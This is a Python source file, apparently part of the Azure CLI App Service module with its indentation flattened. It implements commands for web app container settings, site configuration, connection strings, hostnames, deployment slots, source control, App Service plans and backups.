def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
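# Illustrative examples (hypothetical image names, not part of the original module):
#   _format_fx_version('nginx:latest')               -> 'DOCKER|nginx:latest'
#   _format_fx_version('docker|nginx:latest')        -> 'docker|nginx:latest'   (prefix already present)
#   _format_fx_version('myencodedconfig', 'COMPOSE') -> 'COMPOSE|myencodedconfig'
#   _format_fx_version('   ')                        -> ' '                     (blank image clears the setting)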
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
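# Illustrative examples (hypothetical URLs, not part of the original module):
#   url_validator('https://example.com/docker-compose.yml') -> True
#   url_validator('docker-compose.yml')                     -> False (no scheme or host)
#   url_validator('https://example.com')                    -> False (a path component is also required)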
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
    # base64-encode the file contents and decode the resulting bytes into a utf-8 string
return b64encode(config_file_bytes).decode('utf-8')
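# The encoded value produced here is what update_container_settings passes to _format_fx_version,
# e.g. 'COMPOSE|<base64 of docker-compose.yml>'; _get_linux_multicontainer_decoded_config reverses it.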
# Note: if the non-optional parameters below are modified, adjust the reflection logic
# inside the method accordingly
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is already used in azure.cli.core.commands, and there is no simple
    # functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
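# Illustrative: a generic configuration entry can be a JSON object such as '{"minTlsVersion": "1.2"}'
# (merged via get_json_object) or a plain 'key=value' pair handled by the fallback split above.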
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
    if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
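# Illustrative _build_app_settings_output shape (values are examples only):
# [{'name': 'WEBSITES_ENABLE_APP_SERVICE_STORAGE', 'value': 'false', 'slotSetting': False}, ...]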
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings | --slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
        if value[0] in ["'", '"']:  # strip away the quotes used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
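# CONTAINER_APPSETTING_NAMES drives which app settings _filter_for_container_settings surfaces as
# container configuration, while APPSETTINGS_TO_MASK lists the subset whose values are blanked out.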
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
        logger.warning('Must specify both --multicontainer-config-file FILE and --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
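# _mask_creds_related_appsettings is intended to blank out settings named in APPSETTINGS_TO_MASK
# (currently the registry password) so that credentials are not echoed back to the caller.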
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
    # the logic here is ported from the portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
        raise CLIError('The following parameters are only applicable when cd_project_url is provided: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, ' +
                       'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors (anything other than 50x), just throw; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
            raise CLIError('Windows containers are not yet supported in an app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase.id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
        logger.warning('Nothing to update. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
